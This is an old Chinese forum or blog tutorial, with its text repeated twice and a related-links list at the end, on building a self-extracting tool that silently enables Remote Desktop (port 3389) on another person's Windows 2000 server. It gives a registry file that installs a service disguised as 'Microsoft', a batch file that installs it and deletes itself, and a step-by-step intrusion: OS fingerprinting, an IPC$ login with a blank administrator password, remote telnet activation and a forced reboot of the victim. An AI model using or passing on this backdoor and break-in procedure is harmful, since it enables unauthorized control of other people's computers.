制作开启3389的工具
2005-04-25 08:03
232 查看
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD]
"Start"=dword:00000002
[HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,/
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,/
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein //ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use //ip/ipc$ "pass" /user:name
copy file //ip/admin$/system32
用opentelnet开对方的telnet
opentelnet //ip name pass 1 99
用telnet进入
进入到对方的winnt/system32/
目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢
看见了么,开启成功!
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD]
"Start"=dword:00000002
[HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,/
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,/
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein //ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use //ip/ipc$ "pass" /user:name
copy file //ip/admin$/system32
用opentelnet开对方的telnet
opentelnet //ip name pass 1 99
用telnet进入
进入到对方的winnt/system32/
目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢
看见了么,开启成功!
相关文章推荐
- 制作ico图标 | 在线ico图标转换工具 方便制作favicon.ico - 比特...
- 发现几个好的 网页制作工具 代码格式化 过度代码(代码盒子)
- Inno Setup 5 安装包制作工具
- Java开源报表制作工具介绍(开源工具)
- 用asp文件制作的网站流量统计工具
- Unity 界面制作工具EZ GUI介绍
- 利用crosstool-ng-1.14.0制作交叉编译工具链
- 文件系统以及mkyaffsimage工具的制作
- 制作FLV文件的一些工具(备忘)
- 使用python制作ArcGIS插件(1)工具介绍
- 电子书籍制作工具软件大全
- 软件打包工具NSIS安装程序制作系统
- 不了解U盘启动故障,就算换多少个U盘制作工具也没用!
- 一个截屏工具制作的全过程记录——如何使用“拿来主义”
- [转]ISO镜像工具PowerISO和UltraISO制作ISO光盘镜像教程
- 3389蓝屏重启漏洞及工具
- 水印制作工具的思路(二)
- 肢解“文件夹图标”病毒,制作专杀工具——“郑大扫帚”
- 国外媒体推荐的5款当地Passbook通行证制作工具
- 使用开源工具制作网页验证码的方法